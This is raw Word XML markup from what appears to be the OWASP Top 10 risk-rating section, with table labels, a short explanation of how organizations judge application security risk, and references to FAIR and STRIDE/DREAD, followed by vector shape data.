      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="92"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27321B40" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="161" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="92"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C3261" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="337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323232"/>
          <w:w w:val="90"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Technical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E357BB2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54D727F1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="258" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="88"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D241EF1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6" w:space="720" w:equalWidth="0">
            <w:col w:w="2326" w:space="0"/>
            <w:col w:w="2120" w:space="0"/>
            <w:col w:w="1470" w:space="0"/>
            <w:col w:w="1515" w:space="0"/>
            <w:col w:w="1899" w:space="0"/>
            <w:col w:w="1470" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC3EDF3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="708C5A6B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="356" w:lineRule="exact"/>
        <w:ind w:left="2447"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53759E3A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="2447"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243EB83" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="352" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="96"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Weakness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AEF5A0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6D11F0AF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="352" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="94"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B698D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3C1D295A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="92"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C84773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4" w:space="720" w:equalWidth="0">
            <w:col w:w="4607" w:space="0"/>
            <w:col w:w="1357" w:space="0"/>
            <w:col w:w="3380" w:space="0"/>
            <w:col w:w="1456" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F69D3E1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="406" w:lineRule="exact"/>
        <w:ind w:left="7659"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Asset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2350F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2BEA3D84" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="exact"/>
        <w:ind w:left="2447"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5446CC37" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="280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83F04"/>
          <w:w w:val="96"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Weakness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B153CF6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="281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83F04"/>
          <w:w w:val="94"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D0812F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="258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83F04"/>
          <w:w w:val="92"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F8BD6B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4" w:space="720" w:equalWidth="0">
            <w:col w:w="4506" w:space="0"/>
            <w:col w:w="1458" w:space="0"/>
            <w:col w:w="3380" w:space="0"/>
            <w:col w:w="1456" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E878771" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="335" w:lineRule="exact"/>
        <w:ind w:left="7539"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063BE2A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2D830902" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="336" w:lineRule="exact"/>
        <w:ind w:left="2447"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD4A9A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="355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83F04"/>
          <w:w w:val="96"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Weakness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E23A441" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08610ED5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E82C438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b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="96"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Weakness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE4CB8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3EC20769" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A31572" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7A8922" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="356" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="94"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEBCB92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52ED815F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="405" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="783F04"/>
          <w:w w:val="92"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Asset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C88F179" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="363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83F04"/>
          <w:w w:val="90"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4B89A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5" w:space="720" w:equalWidth="0">
            <w:col w:w="4506" w:space="0"/>
            <w:col w:w="1458" w:space="0"/>
            <w:col w:w="1695" w:space="0"/>
            <w:col w:w="1685" w:space="0"/>
            <w:col w:w="1456" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464AB959" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB55729" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="406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Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD92D7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caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D571ED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evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4247FF8B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of the technical and business impact to your organization.  Together, these factors determine the overall risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2349B1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67CEEF1A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B7B68E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE30D9A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="380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What’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="31"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> My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Risk?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D8045" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267EC12B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="337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OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> focuses on identifying the most serious risks for a broad array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C549E3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of organizations. For each of these risks, we provide generic information about</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B07D4F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likelihood and technical impact using the following simple ratings scheme, which is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC3EC23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based on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId6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66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Risk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67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Rating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6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Methodology</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId69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.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7646A32C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0EEED27D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0DB07E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="380" w:lineRule="exact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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738BC9F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A8FA80" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B9ED912" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="347" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA2F79" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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isk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a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ethodology</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03FC2E0C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7345" w:space="0"/>
            <w:col w:w="3455" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7F23D9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="7201"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>·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4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rticle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6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Threat/Risk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7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Modeling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="348F4374" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="7201"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771B8A49" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="7201"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769507DB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="251" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="7201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External</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B47C8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="311" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="7201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FAIR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9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Information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80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Risk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81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Framework</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EDD9ACD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="7201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82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Microsoft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83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Threat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84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Modeling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8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(STRIDE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36886777" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="7293"/>
      </w:pPr>
      <w:hyperlink r:id="rId86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nd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87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DREAD)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29F61487" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="401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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>Only you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> know the specifics of your environment and your business. For any given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E3FC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application, there may not be a threat agent that can perform the relevant attack,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661B31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or the technical impact may not make any difference to your business. Therefore,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D209EF2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you should evaluate each risk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for yourself</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, focusing on the threat agents, security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E9416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controls, and business impacts in your enterprise. We list Threat Agents as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E03F897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pplication Specific, and Business Impacts as Application / Business Specific to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964A894" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="20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indicate these are clearly dependent on the details about your application in your</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A3E292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enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37ECB5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 names of the risks in the Top 10 stem from the type of attack, the type of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80A45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weakness, or the type of impact they cause. We chose names that accurately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E37A3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reflect the risks and, where possible, align with common terminology most likely to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519365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raise awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434778EF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27F738ED" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="6"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="524F963E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="294"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6D8BC827">
          <v:shape id="imagerId88" o:spid="_x0000_s2824" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:131pt;height:714pt;z-index:-252012032;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId88" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="268A811F">
          <v:shapetype id="_x0000_m2823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A884CF8">
          <v:shape id="_x0000_s2822" type="#_x0000_m2823" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25203353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49FD7D3E">
          <v:shapetype id="_x0000_m2821" coordsize="41088,4818" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4015c41088,4015,41085,4081,41077,4145,41065,4208,41047,4269,41025,4327,40998,4384,40968,4438,40933,4489,40895,4537,40853,4583,40807,4625,40759,4663,40708,4698,40654,4728,40597,4755,40539,4777,40478,4795,40415,4807,40351,4815,40285,4818l40285,4818,,4818,,4818,,4818,,4818,,,,,,,,,40285,0c40285,,40351,3,40415,11,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,281,40933,329,40968,380,40998,434,41025,491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1CBA8160">
          <v:shape id="_x0000_s2820" type="#_x0000_m2821" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:84.35pt;width:410.85pt;height:48.15pt;z-index:-252032512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3A020F26">
          <v:shapetype id="_x0000_m2819" coordsize="41188,4918" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4065c41138,4065,41135,4131,41127,4195,41115,4258,41097,4319,41075,4377,41048,4434,41018,4488,40983,4539,40945,4587,40903,4633,40857,4675,40809,4713,40758,4748,40704,4778,40647,4805,40589,4827,40528,4845,40465,4857,40401,4865,40335,4868l40335,4868,50,4868,50,4868,50,4868,50,4868,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,61,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,331,40983,379,41018,430,41048,484,41075,541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7C0C0562">
          <v:shape id="_x0000_s2818" type="#_x0000_m2819" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:83.85pt;width:411.85pt;height:49.15pt;z-index:-252031488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743785F9">
          <v:shapetype id="polygon14" o:spid="_x0000_m2817" coordsize="41088,4817" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4014c41088,4014,41085,4080,41077,4144,41065,4207,41047,4268,41025,4327,40998,4383,40968,4437,40933,4488,40895,4537,40853,4582,40807,4624,40759,4662,40708,4697,40654,4727,40597,4754,40539,4776,40478,4794,40415,4807,40351,4814,40285,4817l40285,4817,,4817,,4817,,4817,,4817,,,,,,,,,40285,0c40285,,40351,3,40415,10,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,280,40933,329,40968,380,40998,434,41025,490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111B8796">
          <v:shape id="WS_polygon14" o:spid="_x0000_s2816" type="#polygon14" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:147.6pt;width:410.85pt;height:48.15pt;z-index:-252030464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682D4F25">
          <v:shapetype id="polygon15" o:spid="_x0000_m2815" coordsize="41188,4917" o:spt="100" adj="0,,0" path="m41138,853l41138,853,41138,4064c41138,4064,41135,4130,41127,4194,41115,4257,41097,4318,41075,4377,41048,4433,41018,4487,40983,4538,40945,4587,40903,4632,40857,4674,40809,4712,40758,4747,40704,4777,40647,4804,40589,4826,40528,4844,40465,4857,40401,4864,40335,4867l40335,4867,50,4867,50,4867,50,4867,50,4867,50,50,50,50,50,50,50,50,40335,50c40335,50,40401,53,40465,60,40528,73,40589,91,40647,113,40704,140,40758,170,40809,205,40857,243,40903,285,40945,330,40983,379,41018,430,41048,484,41075,540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2D422D7D">
          <v:shape id="WS_polygon15" o:spid="_x0000_s2814" type="#polygon15" style="position:absolute;left:0;text-align:left;margin-left:122.7pt;margin-top:147.1pt;width:411.85pt;height:49.15pt;z-index:-252029440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5ED7CF3A">
          <v:shapetype id="_x0000_m2813" coordsize="41088,4817" o:spt="100" adj="0,,0" path="m41088,803l41088,803,41088,4014c41088,4014,41085,4080,41077,4144,41065,4207,41047,4268,41025,4326,40998,4383,40968,4437,40933,4488,40895,4536,40853,4582,40807,4624,40759,4662,40708,4697,40654,4727,40597,4754,40539,4776,40478,4794,40415,4806,40351,4814,40285,4817l40285,4817,,4817,,4817,,4817,,4817,,,,,,,,,40285,0c40285,,40351,3,40415,10,40478,23,40539,41,40597,63,40654,90,40708,120,40759,155,40807,193,40853,235,40895,280,40933,329,40968,380,40998,434,41025,490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1835D477">
          <v:shape id="_x0000_s2812" type="#_x0000_m2813" style="position:absolute;left:0;text-align:left;margin-left:123.2pt;margin-top:210.85pt;width:410.85pt;height:48.15pt;z-index:-252028416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64249E63">
